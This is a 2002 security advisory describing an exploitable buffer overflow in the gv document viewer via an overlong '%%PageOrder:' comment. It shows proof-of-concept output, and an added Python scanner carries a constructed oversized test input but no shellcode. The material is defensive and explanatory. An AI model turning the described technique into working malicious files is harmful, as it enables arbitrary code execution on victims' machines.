
Ghostview Exploitable Buffer Overflow



27th Sep 2002 [SBWID-5714]
COMMAND

	Exploitable Buffer Overflow in gv

SYSTEMS AFFECTED

	This vulnerability affects the latest version of gv, 3.5.8. An exploit
	has been tested on Red Hat Linux 7.3.

PROBLEM

	An issue exclusively disclosed to iDEFENSE by zen-parse
	[zen-parse@gmx.net], iDEFENSE Security Advisory [09.26.2002]:
	

	--snipp--
	

	In order to perform exploitation, an attacker would have to trick a
	user into viewing a malformed PDF or PostScript file from the command
	line. This may be somewhat easier for Unix based email programs that
	associate gv with email attachments. Since gv is not normally installed
	setuid root, an attacker would only be able to cause arbitrary code to
	run with the privileges of that user. Other programs that utilize
	derivatives of gv, such as ggv or kghostview, may also be vulnerable in
	similar ways.
	

	A proof of concept exploit for Red Hat Linux designed by zen-parse is
	attached to this message. It packages the overflow and shellcode in the
	"%%PageOrder:" section of the PDF.
	

	[root@victim]# ls -al /tmp/itworked
	/bin/ls: /tmp/itworked: No such file or directory
	[root@victim]# gv gv-exploit.pdf
	[root@victim]# ls -al /tmp/itworked
	-rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
	[root@victim]#

	--snapp--
	

	

SOLUTION

	No patch; change viewer?
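
	With no patch available, files can be screened before they reach gv.
	The check below is an added example, not part of the original advisory:
	it flags DSC comment lines such as "%%PageOrder:" that are oversized,
	contain binary bytes, or carry an undefined value. The 255-byte limit
	and the allowed values are taken from Adobe's DSC 3.0 conventions, and
	all names in the code are hypothetical.

```python
import re
import sys

# Assumptions (not from the advisory): DSC 3.0 limits lines to 255 bytes and
# defines only these %%PageOrder values. All names here are hypothetical.
MAX_DSC_LINE = 255
PAGE_ORDER_VALUES = {b"Ascend", b"Descend", b"Special", b"(atend)"}
DSC_LINE = re.compile(rb"^%%([^: \t]*):?[ \t]*(.*)$")


def scan_dsc(data: bytes):
    """Return (line_no, keyword, reason) findings for DSC comment lines."""
    findings = []
    for no, raw in enumerate(re.split(rb"\r\n|\r|\n", data), start=1):
        m = DSC_LINE.match(raw)
        if not m:
            continue  # not a "%%" structuring comment
        key, value = m.group(1).decode("ascii", "replace"), m.group(2)
        if len(raw) > MAX_DSC_LINE:
            findings.append((no, key, f"line is {len(raw)} bytes (> {MAX_DSC_LINE})"))
        if any((b < 0x20 and b != 0x09) or b > 0x7E for b in value):
            findings.append((no, key, "non-printable bytes in value"))
        if key == "PageOrder" and value.strip() not in PAGE_ORDER_VALUES:
            findings.append((no, key, "value is not a defined page order"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if any DSC comment line violates the checks above."""
    return bool(scan_dsc(data))


# Constructed samples: a normal header, and one with an oversized %%PageOrder
# value holding binary filler (no working payload).
BENIGN = b"%!PS-Adobe-3.0\n%%Creator: groff\n%%PageOrder: Ascend\n%%EndComments\n%%EOF\n"
MALFORMED = (b"%!PS-Adobe-3.0\r\n%%PageOrder: " + b"A" * 400 + b"\x80\xfe\xff"
             + b"\r\n%%EndComments\r\n%%EOF\r\n")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for no, key, why in scan_dsc(fh.read()):
                print(f"{path}:{no}: %%{key}: {why}")
```

	Pass the files to check as command-line arguments. A finding is a
	reason to keep the file away from gv and its derivatives, not proof of
	an exploit.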

